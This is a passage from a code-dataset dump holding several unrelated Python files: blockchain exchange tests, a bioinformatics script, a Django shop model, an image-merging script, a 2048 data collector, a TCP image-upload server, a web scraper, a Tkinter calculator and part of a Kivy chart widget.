bob_wallet)\n\n logs = ocn.exchange.search_exchange_by_data_token(dt.address)\n\n assert logs[0].args.dataToken == dt.address\n assert logs[1].args.dataToken == dt.address\n assert exchange_id1 == logs[0].args.exchangeId\n assert alice_wallet.address == logs[0].args.exchangeOwner\n assert exchange_id2 == logs[1].args.exchangeId\n assert bob_wallet.address == logs[1].args.exchangeOwner\n\n\ndef test_ocean_exchange(publisher_ocean_instance):\n \"\"\"Tests various flows of DataToken exchanges.\"\"\"\n ocn = publisher_ocean_instance\n alice_wallet = get_publisher_wallet()\n bob_wallet = get_consumer_wallet()\n dt = ocn.create_data_token(\n \"DataToken1\", \"DT1\", alice_wallet, blob=\"http://example.com\"\n )\n dt.mint(bob_wallet.address, to_wei(100), alice_wallet)\n ox = OceanExchange(\n ocn.web3,\n 
ocn.OCEAN_address,\n _get_exchange_address(publisher_ocean_instance.config),\n ocn.config,\n )\n rate = to_wei(\"0.9\")\n x_id = ox.create(dt.address, rate, bob_wallet)\n dt.approve(ox._exchange_address, to_wei(20), bob_wallet)\n\n # create with invalid token address\n with pytest.raises(ValueError):\n ox.create(ox.ocean_address, rate, bob_wallet)\n\n # TODO: Enable this ValueError handling when the ERC20 check is added in FixedRateExchange.create solidity function\n # with pytest.raises(ValueError):\n # ox.create(ox._exchange_address, 0.9, bob_wallet)\n\n # create with negative rate, should fail\n with pytest.raises(AssertionError):\n _ = ox.create(dt.address, -rate, bob_wallet)\n\n # create using 0 rate\n with pytest.raises(AssertionError):\n _ = ox.create(dt.address, 0, bob_wallet)\n\n ##############\n # get_quote\n base_token_amount = ox.get_quote(to_wei(2), exchange_id=x_id)\n expected_base_token_amount = to_wei(\"1.8\") # 2 * 9\n assert (\n base_token_amount == expected_base_token_amount\n ), f\"unexpected quote of {pretty_ether_and_wei(base_token_amount, 'OCEAN')}, should be {pretty_ether_and_wei(expected_base_token_amount, 'OCEAN')}.\"\n\n #############\n # test buying datatokens\n # Alice is buying from exchange owned by bob\n assert (\n ox.buy_at_fixed_rate(\n to_wei(2),\n alice_wallet,\n max_OCEAN_amount=base_token_amount,\n data_token=dt.address,\n exchange_owner=bob_wallet.address,\n )\n is True\n ), \"buy datatokens failed\"\n assert (\n ox.buy_at_fixed_rate(\n to_wei(2),\n alice_wallet,\n max_OCEAN_amount=base_token_amount,\n exchange_id=x_id,\n )\n is True\n ), \"buy datatokens failed\"\n\n rate = to_wei(1)\n assert ox.setRate(rate, bob_wallet, exchange_id=x_id)\n # re-evaluate with new rate\n base_token_amount = ox.get_quote(to_wei(2), exchange_id=x_id)\n expected_base_token_amount = to_wei(2)\n assert (\n base_token_amount == expected_base_token_amount\n ), f\"unexpected quote of {pretty_ether_and_wei(base_token_amount, 'OCEAN')} base tokens, should be {pretty_ether_and_wei(expected_base_token_amount, 'OCEAN')}.\"\n","sub_path":"ocean_lib/ocean/test/test_ocean_exchange.py","file_name":"test_ocean_exchange.py","file_ext":"py","file_size_in_byte":4459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"219072409","text":"import math\r\ninput_file = open(\"rosalind_prob (1).txt\", 'r')\r\n\r\nlines = input_file.readlines()\r\ncount_gc = 0\r\ncount_at = 0\r\nb = []\r\ndna_string = lines[0]\r\n\r\n# calculating number of GC and AT occurences in the DNA string\r\ncount_gc = dna_string.count('G') + dna_string.count('C')\r\ncount_at = dna_string.count('A') + dna_string.count('T')\r\n\r\n#getting the list of GC values from A\r\ngc_list = lines[1].split()\r\n\r\nfor gc_count in gc_list:\r\n\tgc_percentage = float(gc_count)/2\r\n\tat_percentage = 0.5 - gc_percentage\r\n\tgc_percentage = gc_percentage**count_gc\r\n\tat_percentage = at_percentage**count_at\r\n\tb.append(float(\"{0:.3f}\".format(math.log10(gc_percentage*at_percentage))))\r\n\r\noutput = \"\"\r\n\r\n#formatting the output in the required string form\r\nfor i in b:\r\n\toutput = output + str(i) + \" \"\r\n\r\nprint(output)","sub_path":"PROB.py","file_name":"PROB.py","file_ext":"py","file_size_in_byte":799,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"291510569","text":"\"\"\"\nbyceps.services.shop.shop.dbmodels\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n:Copyright: 2014-2023 Jochen Kupperschmidt\n:License: Revised 
BSD (see `LICENSE` file for details)\n\"\"\"\n\nfrom typing import TYPE_CHECKING\n\nfrom moneyed import Currency, get_currency\n\n\nif TYPE_CHECKING:\n hybrid_property = property\nelse:\n from sqlalchemy.ext.hybrid import hybrid_property\nfrom sqlalchemy.ext.mutable import MutableDict\n\nfrom byceps.database import db\nfrom byceps.typing import BrandID\nfrom byceps.util.instances import ReprBuilder\n\nfrom .models import ShopID\n\n\nclass DbShop(db.Model):\n \"\"\"A shop.\"\"\"\n\n __tablename__ = 'shops'\n\n id = db.Column(db.UnicodeText, primary_key=True)\n brand_id = db.Column(\n db.UnicodeText,\n db.ForeignKey('brands.id'),\n unique=True,\n index=True,\n nullable=False,\n )\n title = db.Column(db.UnicodeText, unique=True, nullable=False)\n _currency = db.Column('currency', db.UnicodeText, nullable=False)\n archived = db.Column(db.Boolean, default=False, nullable=False)\n extra_settings = db.Column(MutableDict.as_mutable(db.JSONB))\n\n def __init__(\n self, shop_id: ShopID, brand_id: BrandID, title: str, currency: Currency\n ) -> None:\n self.id = shop_id\n self.brand_id = brand_id\n self.title = title\n self.currency = currency\n\n @hybrid_property\n def currency(self) -> Currency:\n return get_currency(self._currency)\n\n @currency.setter\n def currency(self, currency: Currency) -> None:\n self._currency = currency.code\n\n def __repr__(self) -> str:\n return ReprBuilder(self).add_with_lookup('id').build()\n","sub_path":"byceps/services/shop/shop/dbmodels.py","file_name":"dbmodels.py","file_ext":"py","file_size_in_byte":1651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"143294983","text":"# -*- coding:utf-8 -*-\n\nimport os,math,re,sys\n\n\n#输入文件名,返回坐标。\ndef GetXY(Data):\n XY=re.match(r'.+x(\\d+)y(\\d+).+',Data)\n a,b=XY.group(1),XY.group(2)\n return(int(a),int(b))\n\nredF='n'\nif len(sys.argv)<2:\n exit('逗比,这样:%s input.txt [y/n]\\nYes&No用于选择是否合成红晕图片。' % sys.argv[0][sys.argv[0].rfind(os.sep)+1:])\nelse:\n f=open(sys.argv[1],'r')\n\nif len(sys.argv)==3:\n redF=sys.argv[2]\n\n#创建一堆字典备用,base是列表。\nBases=[]\nEyes={}\nEyebrows={}\nMouthes={}\nhongyun=[]\n#创建used文件夹。\nif not os.path.exists('used'):\n os.mkdir('used')\n\nbaseName=sys.argv[1].split('.')[0]+'_'\np=0\nfor raw in f.readlines()[2:]:\n line=raw.encode('cp936').decode('shift-jis')\n NS=line.split('\\t')\n Nm=NS[1]\n x='x'+NS[2]\n y='y'+NS[3]\n JY=re.match(r'\\[(.+?)\\][a-z]?[a-z]?(.+)',Nm)\n#分组,并将小组别添加字典对应。\n NewFN=baseName+str(p)+x+y+'.png'\n if JY.group(1)=='DRESS':\n Bases.append(NewFN)\n elif JY.group(1)=='目':\n for GroupEye in JY.group(2).split('+'):\n Eyes[GroupEye]=NewFN\n elif JY.group(1)=='眉':\n for GroupBrow in JY.group(2).split('+'):\n Eyebrows[GroupBrow]=NewFN\n elif JY.group(1)=='口':\n for GroupMouth in JY.group(2).split('+'):\n Mouthes[GroupMouth]=NewFN\n elif JY.group(1)=='頬':\n for GroupMouth in JY.group(2).split('+'):\n hongyun.append(NewFN)\n if os.path.exists(baseName+str(p)+'.png'):\n os.rename(baseName+str(p)+'.png',NewFN)\n p+=1\n\n#开始处理。\nused=[]\npp=0\nfor KeyName in Eyes.keys():\n Ex,Ey=GetXY(Eyes[KeyName])\n EN=Eyes[KeyName]\n Mx,My=GetXY(Mouthes[KeyName])\n MN=Mouthes[KeyName]\n EBx,EBy=GetXY(Eyebrows[KeyName])\n EBN=Eyebrows[KeyName]\n for BaseName in Bases:\n tempM=['convert']\n #求出每个坐标的差值。\n Bx,By=GetXY(BaseName)\n BEx,BEy=str(Ex-Bx),str(Ey-By)\n BMx,BMy=str(Mx-Bx),str(My-By)\n BEBx,BEBy=str(EBx-Bx),str(EBy-By)\n EP=' +'+BEx+'+'+BEy+' '\n MP=' +'+BMx+'+'+BMy+' '\n EBP=' +'+BEBx+'+'+BEBy+' '\n tempM.append(BaseName)\n g1=EN+' -geometry 
'+'+'+BEx+'+'+BEy+' -composite'\n g2=MN+' -geometry '+'+'+BMx+'+'+BMy+' -composite'\n g3=EBN+' -geometry '+'+'+BEBx+'+'+BEBy+' -composite' \n tempM.append(g1)\n tempM.append(g2)\n tempM.append(g3)\n ON=' '.join(tempM)+' -quality 35 '+baseName+str(pp)+'.png'\n os.system(ON)\n used.append(BaseName)\n used.append(EN)\n used.append(MN)\n used.append(EBN)\n if sys.argv[2]=='y' or sys.argv[2]=='Y':\n for hyi in hongyun:\n hx,hy=GetXY(hyi)\n Ehx,Ehy=str(hx-Bx),str(hy-By)\n gs=hyi+' -geometry '+'+'+Ehx+'+'+Ehy+' -composite '\n os.system('convert '+BaseName+' '+gs+' '+g1+' '+g2+' '+g3+' '+baseName+str(pp)+'r.png')\n used.append(hyi)\n print('红色JBx合成完毕。')\n print('一个JBx合成完毕。')\n pp+=1\n print('一组JBx合成完毕。')\nprint('一大组JBx合成完毕。')\nfor FN in used:\n OldName=os.getcwd()+os.sep+FN\n NewName=os.getcwd()+os.sep+r'used'+os.sep+FN\n if os.path.exists(OldName):\n os.rename(OldName,NewName)\nprint('全部JBx合成完毕。')\n","sub_path":"K2_TJS_cha_merger.py","file_name":"K2_TJS_cha_merger.py","file_ext":"py","file_size_in_byte":3362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"326482435","text":"import numpy as np\r\nfrom game2048.game import Game\r\nfrom game2048.displays import Display\r\nfrom game2048.agents import ExpectiMaxAgent as TestAgent\r\nimport pandas as pd\r\n\r\n'''在云端运行要使用linux下编译的expectimax'''\r\n\r\ndef single_run(size, score_to_win, AgentClass, **kwargs):\r\n game = Game(size, score_to_win)\r\n agent = AgentClass(game, display=Display(), **kwargs)\r\n one = agent.playtosave()\r\n return one\r\n\r\n'''\r\nGAME_SIZE = 4\r\nSCORE_TO_WIN = 2048\r\nN_TESTS = 2\r\n\r\ngame = Game(GAME_SIZE, SCORE_TO_WIN)\r\nagent = TestAgent(game, display=Display())\r\n\r\nfor _ in range(N_TESTS):\r\n oneround = single_run(GAME_SIZE, SCORE_TO_WIN,AgentClass=TestAgent)\r\n onemax = oneround.max(axis=1)\r\n clue = np.argwhere(onemax==128)[0][0]\r\n onelow = oneround[0:clue,:]\r\n onehigh = oneround[clue:np.size(oneround,0),:]\r\n data1 = pd.DataFrame(onelow) # header:原第一行的索引,index:原第一列的索引\r\n data1.to_csv('./data1.csv',index=False, header=False, mode='a+')\r\n data2 = pd.DataFrame(onehigh) # header:原第一行的索引,index:原第一列的索引\r\n data2.to_csv('./data2.csv', index=False, header=False, mode='a+')\r\n '''\r\n\r\n\r\nGAME_SIZE = 4\r\nSCORE_TO_WIN = 2048\r\nN_TESTS = 6000\r\ngroup = 2\r\n\r\ngame = Game(GAME_SIZE, SCORE_TO_WIN)\r\nagent = TestAgent(game, display=Display())\r\n\r\nfor i in range(int(N_TESTS / group)):\r\n oneround = single_run(GAME_SIZE, SCORE_TO_WIN, AgentClass=TestAgent)\r\n sumround = oneround\r\n for _ in range(group-1):\r\n oneround = single_run(GAME_SIZE, SCORE_TO_WIN,AgentClass=TestAgent)\r\n sumround = np.vstack((sumround, oneround))\r\n\r\n data = pd.DataFrame(sumround) # header:原第一行的索引,index:原第一列的索引\r\n data.to_csv('./data3.csv', index=False, header=False, mode='a+')\r\n\r\n\r\n","sub_path":"game2048/get_data.py","file_name":"get_data.py","file_ext":"py","file_size_in_byte":1804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"73586605","text":"from socket import *\r\nfrom _thread import *\r\nimport threading\r\nimport datetime\r\nimport signal\r\nimport sys\r\n\r\nimport paho.mqtt.client as mqtt\r\nfrom s3_upload import upload_to_s3\r\nimport os\r\nimport signal\r\nimport uuid\r\nimport threading\r\n\r\nfrom time import sleep\r\n\r\nserverPort = 8110\r\nserverSocket = socket(AF_INET, SOCK_STREAM)\r\nserverSocket.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)\r\nserverSocket.bind(('', 
serverPort))\r\nserverSocket.listen(1)\r\n# serverSock.settimeout(None)\r\n\r\nclientNumber = 0\r\ncountOfTotalClient = 0\r\ncountOfRequest = 0\r\nconnectionSocket = None\r\n\r\nthreadArr = []\r\ntimerThread = None\r\n\r\nConverterSemaphore = 1\r\n\r\n# timer function\r\ndef timerFunction() :\r\n print ('Scheduler : {0} Clients connected now.'.format(countOfTotalClient))\r\n\r\n# set timer\r\ndef repeatTimer(interval) :\r\n global timerThread\r\n timerThread = threading.Timer(interval, lambda : (timerFunction(), repeatTimer(interval)))\r\n timerThread.start()\r\n\r\n# ctrl + c handler\r\ndef signal_handler(sig, frame):\r\n for t in threadArr :\r\n if t != None :\r\n t._exit()\r\n if timerThread != None :\r\n timerThread.cancel()\r\n if serverSocket != None :\r\n serverSocket.close()\r\n print('Bye bye~') \r\n sys.exit(0)\r\n\r\n# MyThread Class\r\nclass MyThread(threading.Thread) :\r\n def __init__(self, _connectionSocket, _clientAddress, _clientNumber) :\r\n threading.Thread.__init__(self)\r\n self.__suspend = False\r\n self.__exit = threading.Event()\r\n self._connectionSocket = _connectionSocket\r\n self._clientAddress = _clientAddress\r\n self._clientNumber = _clientNumber\r\n\r\n def _exit(self) :\r\n if (self._connectionSocket != None) :\r\n self._connectionSocket.shutdown(SHUT_RDWR)\r\n self._connectionSocket.close()\r\n self.__exit.set()\r\n\r\n def run(self) :\r\n #self._connectionSocket.settimeout(1)\r\n global countOfTotalClient\r\n global countOfRequest\r\n # reset request count (for Menu 4)\r\n \r\n # recv File information\r\n filename = \"\"\r\n f = None\r\n file_path = \"\"\r\n # communicate with client\r\n while (not self.__exit.is_set()) :\r\n\r\n # menu that selected by client\r\n choose = None\r\n payload = None\r\n\r\n # exception handling ( when client closes TCP connection )\r\n try :\r\n # menu that selected by client\r\n if (self.__exit.is_set()) :\r\n break\r\n\r\n payload = self._connectionSocket.recv(4096)\r\n if payload.find(b'AT+IMGEND') != -1:\r\n f.close()\r\n \r\n os.system('./convert -f '+filename+\".raw\")\r\n print(file_path)\r\n upload_to_s3(str(filename)+\".raw.png\",str(file_path))\r\n\r\n elif payload.find(b\"AT+IMGSTART\") != -1:\r\n\r\n print(payload)\r\n now = datetime.datetime.now()+datetime.timedelta(hours=9)\r\n filename = now.strftime('%Y-%m-%d-%H:%M:%S') + \"AA\"\r\n\r\n f = open(f'{filename}.raw', 'a+b')\r\n\r\n payload = payload.replace(b'AT+IMGSTART;;',b'')\r\n print(payload)\r\n path_idx = payload.find(b';;')\r\n file_path = payload[:path_idx].decode('utf-8')\r\n\r\n print(\"Path_index : \" + str(path_idx))\r\n print(\"File Path_ : \" + file_path)\r\n if path_idx == -1:\r\n print(\"not vailid Packet.\")\r\n continue\r\n\r\n #f.write(payload)\r\n print(\"Started!\")\r\n\r\n elif not payload :\r\n countOfTotalClient = countOfTotalClient - 1\r\n print('Client {0} disconnected. Number of connected clients = {1}'.format(self._clientNumber, countOfTotalClient))\r\n self._connectionSocket.close()\r\n self._connectionSocket = None\r\n break\r\n\r\n else:\r\n f.write(payload)\r\n\r\n payload = payload\r\n #print(payload[-100:])\r\n choose = payload[0]\r\n\r\n if (choose == '') :\r\n raise BrokenPipeError\r\n except timeout :\r\n continue\r\n except (ConnectionAbortedError, BrokenPipeError) :\r\n print('the connection socket has been closed by client! Bye bye~')\r\n countOfTotalClient = countOfTotalClient - 1\r\n print('Client {1} disconnected. 
Number of connected clients = {2}'.format(self._clientNumber, countOfTotalClient))\r\n self._connectionSocket.close()\r\n self._connectionSocket = None\r\n break\r\n\r\n modifiedMessage = 'message'\r\n #handle other input (error)\r\n #self._connectionSocket.send(modifiedMessage.encode())\r\n\r\n # close connectionSocket and wait to connect again\r\n if self._connectionSocket != None : \r\n self._connectionSocket.close()\r\n\r\n# Main Function below\r\n\r\n# bind handler \r\nsignal.signal(signal.SIGINT, signal_handler)\r\nprint(\"The server is ready to receive on port\", serverPort)\r\n\r\n# set timer to 60 seconds\r\nrepeatTimer(60)\r\n\r\n# server process (listen)\r\nwhile True:\r\n \r\n # set connection with client\r\n (connectionSocket, clientAddress) = serverSocket.accept()\r\n print('Connection requested from', clientAddress)\r\n\r\n clientNumber += 1\r\n countOfTotalClient += 1\r\n print('Client {0} connected. Number of connected clients = {1}'.format(clientNumber, countOfTotalClient))\r\n\r\n t = MyThread(connectionSocket, clientAddress, clientNumber)\r\n t.start()\r\n threadArr.append(t)\r\n \r\n# close server socket\r\nif serverSocket != None :\r\n serverSocket.close()\r\n","sub_path":"MultiThreadTCPServer___.py","file_name":"MultiThreadTCPServer___.py","file_ext":"py","file_size_in_byte":5904,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"317147343","text":"__author__ = 'MarinaFomicheva'\n\n\ndef print_sentences(tgt, ref, outdir):\n\n it = open(tgt, 'r')\n ir = open(ref, 'r')\n o = open(outdir + '/' + 'phrases.txt', 'w')\n\n tgt_segs = it.readlines()\n ref_segs = ir.readlines()\n\n for i, phrase in enumerate(ref):\n\n o.write(str(i) + '\\t' + ref_segs[i].strip() + '\\n')\n o.write(tgt_segs[i].strip() + '\\n\\n')\n\n o.close()\n\n\n\n\n\n\n\n\n\n","sub_path":"print_sentences.py","file_name":"print_sentences.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"430466337","text":"def _check_key(self, key):\n \"get a specific key from the result or it's items\"\n if (isinstance(self._result, dict) and (key in self._result)):\n return self._result.get(key, False)\n else:\n flag = False\n for res in self._result.get('results', []):\n if isinstance(res, dict):\n flag |= res.get(key, False)\n return flag","sub_path":"Data Set/bug-fixing-5/5a0621db554c310b110dbd8348c7ed48f11ba044-<_check_key>-fix.py","file_name":"5a0621db554c310b110dbd8348c7ed48f11ba044-<_check_key>-fix.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"490803058","text":"def fizz_buzz():\n # your code here\n resultado = \"\"\n for x in range(1, 101):\n if calcularSiMultiplo(x, 3) == True:\n resultado = \"Fizz\"\n if calcularSiMultiplo(x, 5) == True:\n resultado = resultado + \"Buzz\"\n if(resultado == \"\"):\n resultado = x\n print(resultado)\n resultado = \"\"\n\ndef calcularSiMultiplo(numero, multiploDe):\n resto = numero % multiploDe\n if resto == 0 :\n return True\n else: \n return False\n \nfizz_buzz()","sub_path":"exercises/19-Looping-With-FizzBuzz/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"481643157","text":"from rest_framework import status\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\n\nfrom 
game.serializers.clan_members_serializers import (\n ClanMembersListSerializer,\n ClanMemberSerializer,\n ClanMemberJoinSerializer\n)\n\n\nclass ClanMembersListView(APIView):\n serializer_class = ClanMembersListSerializer\n model = serializer_class.Meta.model\n\n def get(self, request):\n clan_id = self._get_clan_id_from(request, 'clan_id')\n clan = self.model.objects.filter(id=clan_id)\n if clan.exists():\n clan = clan.first()\n return Response(self.serializer_class(clan).data, status.HTTP_200_OK)\n return Response({'Error': f'No clan with such id \"{clan_id}\"'}, status.HTTP_404_NOT_FOUND)\n\n @staticmethod\n def _get_clan_id_from(request, param):\n clan_id = request.GET.get(param)\n if not clan_id:\n if hasattr(request.user, 'clan_member'):\n clan_id = request.user.clan_member.clan.id\n return clan_id\n\n\nclass ClanMemberView(APIView):\n serializer_class = ClanMemberSerializer\n model = serializer_class.Meta.model\n\n def get(self, request):\n member_id = self._get_member_id_from(request)\n clan_member = self.model.objects.filter(user_id=member_id)\n if clan_member.exists():\n return Response(self.serializer_class(clan_member.first()).data, status=status.HTTP_200_OK)\n return Response({'Error': f'Clan member with such id \"{member_id}\" does not exist'}, status.HTTP_404_NOT_FOUND)\n\n @staticmethod\n def _get_member_id_from(request):\n member_id = request.GET.get('id')\n if not member_id and hasattr(request.user, 'clan_member'):\n member_id = request.user.id\n return member_id\n\n\nclass ClanMemberJoinView(APIView):\n serializer_class = ClanMemberJoinSerializer\n model = serializer_class.Meta.model\n\n def post(self, request):\n data = self._get_data_from(request)\n serializer = self.serializer_class(data=data)\n serializer.is_valid(raise_exception=True)\n serializer.add_member()\n return Response({'OK': f'User was joined the clan'})\n\n @staticmethod\n def _get_data_from(request):\n data = {\n 'id': request.GET.get('id') or request.GET.get('clan_id'),\n 'user': request.user.id\n }\n return data\n\n\nclass ClanMemberLeaveView(APIView):\n\n @staticmethod\n def post(request):\n user = request.user\n if hasattr(user, 'clan_member'):\n clan = user.clan_member.clan\n clan.remove(user)\n return Response({'OK': f'User was removed from the clan'}, status.HTTP_200_OK)\n return Response({'Error': 'User not in clan'}, status.HTTP_400_BAD_REQUEST)\n","sub_path":"game/views/clan_member_views.py","file_name":"clan_member_views.py","file_ext":"py","file_size_in_byte":2788,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"101118992","text":"from scrapy.spiders import Spider\nfrom scrapy.selector import Selector\nimport scrapy\nfrom dirbot.items import Booklist\n\n\nclass LibSpider(Spider):\n name = \"lib\"\n allowed_domains = [\"202.119.252.200\"]\n start_urls = [\n \"http://202.119.252.200:8080/opac/show_user_shelf.php?classid=0000003696\",\n \"http://202.119.252.200:8080/opac/show_user_shelf.php?classid=0000003628\",\n \"http://202.119.252.200:8080/opac/show_user_shelf.php?classid=0000003745\"\n ]\n\n def parse(self, response):\n \"\"\"\n The lines below is a spider contract. 
For more info see:\n http://doc.scrapy.org/en/latest/topics/contracts.html\n\n @url http://www.dmoz.org/Computers/Programming/Languages/Python/Resources/\n @scrapes name\n \"\"\"\n sel = Selector(response)\n #sites = sel.xpath('//div/table/tr/td')\n urls = sel.xpath('//div/table/tr//td/a/@href').extract()\n\n for url in urls:\n tureurl = \"http://202.119.252.200:8080/opac/\" + url\n yield scrapy.Request(tureurl, callback = self.parse_new)\n \n def parse_new(self, response):\n items = []\n selx = Selector(response)\n sites = selx.xpath('//div[@id=\"s_c_left\"]')\n \n for site in sites:\n item = Booklist()\n item['name'] = selx.xpath('//div/dl[1]/dd[1]/a/text()').extract()\n item['number'] = selx.xpath('//div/table/tr/td[@bgcolor=\"#FFFFFF\"][1]/text()').extract()\n item['site'] = selx.xpath('//div/table/tr/td[@bgcolor=\"#FFFFFF\"][5]/text()').extract()\n item['cond'] = selx.xpath('//div/table/tr/td[@bgcolor=\"#FFFFFF\"][7]/text()|//div/table/tr/td[7]//font/text()').extract()\n items.append(item)\n\n return items\n","sub_path":"dirbot/spiders/lib.py","file_name":"lib.py","file_ext":"py","file_size_in_byte":1747,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"351356041","text":"'''PROGRAM TO DESIGN A GUI BASED CALCULATOR USING Tkinter.'''\n\n#Importing Tk,Entry,END,Button from tkinter module\nfrom tkinter import Tk,Entry,END,Button\n\n#Creating a window\nroot = Tk()\nroot.title(\"Simple Calculator\")\n\n#Entry \ne = Entry(root , width = 35, borderwidth = 5)\ne.grid(row = 0 , column = 0 , columnspan = 3 , padx = 10, pady = 10)\n\n#Function commands\ndef click(number):\n current = e.get()\n e.delete(0,END)\n e.insert(0, str(current) + str(number))\n \ndef clear():\n e.delete(0,END)\n \ndef add():\n f_n = e.get()\n global f_num\n global math\n math = \"addition\"\n f_num = int(f_n)\n e.delete(0,END)\n \ndef sub():\n f_n = e.get()\n global f_num\n global math\n math = \"subtraction\"\n f_num = int(f_n)\n e.delete(0,END)\n \ndef mul():\n f_n = e.get()\n global f_num\n global math\n math = \"multiplication\"\n f_num = int(f_n)\n e.delete(0,END)\n \ndef div():\n f_n = e.get()\n global f_num\n global math\n math = \"division\"\n f_num = int(f_n)\n e.delete(0,END)\n \ndef equal():\n s_num = int(e.get())\n e.delete(0, END)\n if math == \"addition\":\n e.insert(0 , f_num + s_num)\n elif math == \"subtraction\":\n e.insert(0 , f_num - s_num)\n elif math == \"multiplication\":\n e.insert(0 , f_num * s_num)\n elif math == \"division\":\n e.insert(0 , f_num / s_num)\n\n#Define buttons\nbt1 = Button(root, text = \"1\", padx = 40 , pady = 20, command = lambda : click(1))\nbt2 = Button(root, text = \"2\", padx = 40 , pady = 20, command = lambda : click(2))\nbt3 = Button(root, text = \"3\", padx = 40 , pady = 20, command = lambda : click(3))\nbt4 = Button(root, text = \"4\", padx = 40 , pady = 20, command = lambda : click(4))\nbt5 = Button(root, text = \"5\", padx = 40 , pady = 20, command = lambda : click(5))\nbt6 = Button(root, text = \"6\", padx = 40 , pady = 20, command = lambda : click(6))\nbt7 = Button(root, text = \"7\", padx = 40 , pady = 20, command = lambda : click(7))\nbt8 = Button(root, text = \"8\", padx = 40 , pady = 20, command = lambda : click(8))\nbt9 = Button(root, text = \"9\", padx = 40 , pady = 20, command = lambda : click(9))\nbt0 = Button(root, text = \"0\", padx = 40 , pady = 20, command = lambda : click(0))\nbtadd = Button(root, text = \"+\", padx = 39 , pady = 20, command = add)\nbtsub = Button(root, text = \"-\", padx = 41 , 
pady = 20, command = sub)\nbtmul = Button(root, text = \"*\", padx = 40 , pady = 20, command = mul)\nbtdiv = Button(root, text = \"/\", padx = 41 , pady = 20, command = div)\n \nbtEquals = Button(root, text = \"=\", padx = 90 , pady = 20, command = equal)\nbtClear = Button(root, text = \"Clear\", padx = 79 , pady = 20, command = clear)\n \nbt1.grid(row = 3, column = 0)\nbt2.grid(row = 3, column = 1)\nbt3.grid(row = 3, column = 2)\n \nbt4.grid(row = 2, column = 0)\nbt5.grid(row = 2, column = 1)\nbt6.grid(row = 2, column = 2)\n \nbt7.grid(row = 1, column = 0)\nbt8.grid(row = 1, column = 1)\nbt9.grid(row = 1, column = 2)\n \nbt0.grid(row = 4, column = 0 )\nbtadd.grid(row = 5, column = 0 )\nbtEquals.grid(row = 5, column = 1, columnspan = 2)\nbtClear.grid(row = 4, column = 1, columnspan = 2)\nbtsub.grid(row = 6, column = 0 )\nbtmul.grid(row = 6, column = 1 )\nbtdiv.grid(row = 6, column = 2 )\nroot.mainloop()","sub_path":"Week 7/Program6.py","file_name":"Program6.py","file_ext":"py","file_size_in_byte":3258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"101208638","text":"# Standard library imports\n\nfrom datetime import timedelta\nfrom colorsys import rgb_to_hsv\n\n# Kivy imports\n\nfrom kivy.core.window import Window\nfrom kivy.graphics import Color, Line, Rectangle\nfrom kivy.uix.button import Button\nfrom kivy.uix.label import Label\nfrom kivy.uix.widget import Widget\nfrom kivy.uix.scrollview import ScrollView\nfrom kivy.uix.boxlayout import BoxLayout\nfrom kivy.properties import BooleanProperty, NumericProperty\n\n\nclass Chart(Widget):\n font_width_ratio = 0.67\n font_name = 'RobotoMono-Regular'\n hints = {'left': 0.01, 'right': 0.02, 'bottom': 0.01, 'top': 0.01}\n mid_space_factor = 0.01\n h_axis_height_factor = 0.05\n legend_area_height = 0.05\n title_area_height = 0.05\n minimal_height = 300\n minimal_width = 100\n min_font_size = NumericProperty(16)\n\n def __init__(self):\n super().__init__()\n\n\nclass Hbarchart(Chart):\n grid_widget = None\n max_label_lenght = 63\n black = BooleanProperty(True)\n grid = BooleanProperty(True)\n stacked_colors = [(0.1, 0.5, 0), (0.38, 0.59, 0),\n (0.6, 0.62, 0), (204, 164, 0), (1, 0.65, 0)]\n one_color = [(1, 0, 0)]\n grid_counter = 0\n unit = '-'\n slices = 11\n time = False\n lang_dict = {'day': 'day', 'days': 'days'}\n legend = []\n title = ''\n values = [['0']]\n labels = ['label']\n pareto = False\n pareto_color_ads = [0.5, 0.2, 0.0]\n pareto_limits = [0.70, 0.90, 1.00]\n pareto_labels = ['(70%)', '(20%)', '(10%)']\n\n def __init__(self, **kwargs):\n '''\n values = ['0'] (or values = [[], [], ..., []]), labels = ['label'],\n hints = {'left': 0.01, 'right': 0.02, 'bottom': 0.01, 'top': 0.01}\n mid_space_factor = 0.01, h_axis_height_factor = 0.05,\n legend_area_height = 0.05, title_area_height = 0.05, unit = '-', \n slices = 11, time = False, lang_dict = {'day': 'day', 'days': 'days'},\n legend = []\n '''\n super(Hbarchart, self).__init__()\n\n self.bind(size=self.new)\n self.bind(black=self.toggle_colors)\n self.bind(grid=self.toggle_grid)\n\n self.new(self, **kwargs, init=True)\n\n def new(self, *args, **kwargs):\n '''\n values = ['0'] (or values = [[], [], ..., []]), labels = ['label'],\n hints = {'left': 0.01, 'right': 0.02, 'bottom': 0.01, 'top': 0.01}\n mid_space_factor = 0.01, h_axis_height_factor = 0.05,\n legend_area_height = 0.05, title_area_height = 0.05, unit = '-', \n slices = 11, time = False, lang_dict = {'day': 'day', 'days': 'days'}, \n legend = []\n '''\n if not 'init' in 
